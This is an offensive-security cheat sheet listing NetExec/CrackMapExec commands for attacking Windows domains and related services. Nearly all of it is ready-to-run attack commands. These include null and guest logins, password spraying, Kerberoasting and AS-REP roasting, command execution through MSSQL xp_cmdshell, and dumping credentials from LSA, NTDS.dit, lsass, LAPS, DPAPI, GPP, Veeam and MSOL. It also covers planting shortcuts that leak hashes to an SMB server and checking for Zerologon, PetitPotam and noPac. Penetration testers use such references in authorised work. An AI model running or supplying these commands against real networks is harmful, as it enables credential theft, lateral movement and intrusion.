New Page
A cheat sheet for NetExec and CrackMapExec, featuring useful commands and modules for different services to use during Pentesting
Enumeration
Initial Enumeration
netexec smb target
Null Authentication
netexec smb target -u '' -p ''
Guest Authentication
netexec smb target -u 'guest' -p ''
List Shares
netexec smb target -u '' -p '' --shares
netexec smb target -u username -p password --shares
List Usernames
netexec smb target -u '' -p '' --users
netexec smb target -u '' -p '' --rid-brute
netexec smb target -u username -p password --users
Local Authentication
netexec smb target -u username -p password --local-auth
Using Kerberos
netexec smb target -u username -p password -k
Check for hosts that have SMB signing disabled
netexec smb target(s) --gen-relay-list relay.txt
Spraying
Password Spray
netexec smb target -u users.txt -p password --continue-on-success
netexec smb target -u usernames.txt -p passwords.txt --no-bruteforce --continue-on-success
netexec ssh target -u username -p password --continue-on-success
SMB
All In One
netexec smb target -u username -p password --groups --local-groups --loggedon-users --rid-brute --sessions --users --shares --pass-pol
Spider_plus Module
netexec smb target -u username -p password -M spider_plus
netexec smb target -u username -p password -M spider_plus -o READ_ONLY=false
Dump a specific file
netexec smb target -u username -p password -k --get-file target_file output_file --share sharename
FTP
List folders and files
netexec ftp target -u username -p password --ls
List files inside a folder
netexec ftp target -u username -p password --ls folder_name
Retrieve a specific file
netexec ftp target -u username -p password --ls folder_name --get file_name
LDAP
Enumerate users using ldap
netexec ldap target -u '' -p '' --users
All In One
netexec ldap target -u username -p password --trusted-for-delegation --password-not-required --admin-count --users --groups
Kerberoast
netexec ldap target -u username -p password --kerberoasting kerb.txt
ASREProast
netexec ldap target -u username -p password --asreproast asrep.txt
MSSQL
Authentication
netexec mssql target -u username -p password
Execute commands using xp_cmdshell
-X for powershell and -x for cmd
netexec mssql target -u username -p password -x command_to_execute
Get a file
netexec mssql target -u username -p password --get-file output_file target_file
Secrets Dump
Dump LSA secrets
netexec smb target -u username -p password --local-auth --lsa
gMSA
netexec ldap target -u username -p password --gmsa-convert-id id
netexec ldap domain -u username -p password --gmsa-decrypt-lsa gmsa_account
Group Policy Preferences
netexec smb target -u username -p password -M gpp_password
Dump LAPS v1 and v2 password
netexec smb target -u username -p password --laps
Dump dpapi credentials
netexec smb target -u username -p password --laps --dpapi
Dump NTDS.dit
netexec smb target -u username -p password --ntds
Bloodhound
netexec ldap target -u username -p password --bloodhound -ns ip --collection All
Useful Modules
Webdav
Checks whether the WebClient service is running on the target
netexec smb ip -u username -p password -M webdav
Veeam
Extracts credentials from local Veeam SQL Database
netexec smb target -u username -p password -M veeam
slinky
Creates windows shortcuts with the icon attribute containing a UNC path to the specified SMB server in all shares with write permissions
netexec smb ip -u username -p password -M slinky
ntdsutil
Dump NTDS with ntdsutil
netexec smb ip -u username -p password -M ntdsutil
ldap-checker
Checks whether LDAP signing and binding are required and/or enforced
cme ldap target -u username -p password -M ldap-checker
Check if the DC is vulnerable to zerologon, petitpotam, nopac
netexec smb target -u username -p password -M zerologon
netexec smb target -u username -p password -M petitpotam
netexec smb target -u username -p password -M nopac
Check the MachineAccountQuota
netexec ldap target -u username -p password -M maq
ADCS Enumeration
netexec ldap target -u username -p password -M adcs
Dump lsass
netexec smb target -u username -p password -M lsassy
Retrieve MSOL account password
netexec smb target -u username -p password -M msol